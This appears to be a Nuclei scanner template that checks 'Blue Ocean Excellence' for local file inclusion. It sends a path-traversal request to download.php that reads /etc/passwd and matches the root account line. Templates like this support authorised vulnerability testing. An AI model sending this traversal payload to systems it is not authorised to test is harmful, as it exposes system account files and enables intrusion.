id: blue-ocean-excellence-lfi

info:
  name: Blue Ocean Excellence - Local File Inclusion
  author: pikpikcu
  severity: high
  description: Blue Ocean Excellence is vulnerable to local file inclusion.
  reference:
    - https://blog.csdn.net/qq_41901122/article/details/116786883
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: blue-ocean,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/download.php?file=../../../../../etc/passwd"

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "toor:[x*]:0:0"

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/07/22
